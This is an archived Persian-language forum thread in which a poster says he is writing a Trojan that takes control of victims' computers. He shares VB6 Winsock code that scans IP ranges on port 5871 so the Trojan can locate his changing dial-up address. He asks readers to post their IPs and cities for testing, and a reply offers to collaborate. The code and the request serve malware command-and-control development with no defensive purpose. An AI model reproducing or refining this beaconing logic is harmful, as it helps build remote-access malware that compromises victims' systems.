PDA

View Full Version : برنامه ی پیدا کردن IP

IamOverlord
دوشنبه 15 شهریور 1389, 19:08 عصر
سلام دوستان!
من در حال نوشتن یه Trojan هستم، که کنترل سیستم قربانی رو به ما می ده و می تونیم دستورات مختلفی رو روی سیستم قربانی اجرا کنیم.
مشکل من اینه که در هر بار اتصال Dial-Up به اینترنت IP ها حتما تغییر می کنند. یعنی سیستم من IP مشخصی نداره که Trojan همیشه با من ارتباط برقرار کنه. Trojan ها هم IP مشخصی ندارند.
چند تا ایده زد به ذهنم، مثلا: ارسال IP قربانی به E-Mail (که اکثر Mail Sender هایی که سورسشون رو گرفتم درست کار نمی کنند) یا این که من IP کامپیوترم رو هر دفعه که به اینترنت وصل می شم تو یه وبلاگ قرار بدم و Trojan اون IP رو از وبلاگ بخونه و به من متصل بشه. (که این هم به دلایلی عملی نشد)، اما یه ایده ی دیگه که به ذهنم زد و می دونستم احمقانه است، اما شدنی، این بود که برنامه با استفاده از 4 حلقه ی for تو در تو تمام 4228250625 آدرس IP رو چک کنه که حدس می زنم حدود 40 ساعت طول می کشه!

کد جست و جوی 4228250625 تا IP :

On Error Resume Next
Winsock1.RemotePort = 5871
For a = 0 To 255
For b = 0 To 255
For c = 0 To 255
For d = 0 To 255
IPAddress = LTrim(Str(a)) + "." + LTrim(Str(b)) + "." + LTrim(Str(c)) + "." + LTrim(Str(d))
Winsock1.RemoteHost = IPAddress
Winsock1.SendData "Search..."
DoEvents
Next d
Next c
Next b
Next a

(البته 127.0.0.1 همیشه خودمونیم، همون LocalHost)

اما وقتی فهمیدم که هر وقت به اینترنت وصل می شم IP من به این صورت هست :

85.133.XXX.XXX
تعداد IP ها به 65025 و زمان جست و جو به حدود 2 ثانیه کاهش یافت !!! (:لبخند:)

کد جست و جوی 65025 تا IP :

On Error Resume Next
For a = 85 To 85
For b = 133 To 133
For c = 0 To 255
For d = 0 To 255
IPAddress = LTrim(Str(a)) + "." + LTrim(Str(b)) + "." + LTrim(Str(c)) + "." + LTrim(Str(d))
Winsock1.RemoteHost = IPAddress
Winsock1.SendData "Search..."
DoEvents
Next d
Next c
Next b
Next a

حالا می خواستم شما هم تست کنید و مشکلات رو بگید و ایده های جدیدی هم اگر دارید بدید (راه های عملی نه فقط تئوری)
ضمنا اگر دوستان می تونند IP و شهری که زندگی می کنند رو بنویسن، فقط برای تست... (باتشکّر)
:چشمک:

sinaavakh
یک شنبه 01 اسفند 1389, 08:41 صبح
Salam Karet khobe Alie
Man Khodam In Barnamaro Tarahi kardam
va ta hoddi Neveshtam age bekhay mitoni behem paiam bedi baham bishtar sobat konim dar barash in id man to yahoo hast
khoshhal misham
ya ali

ID YAHOO : sinaavakh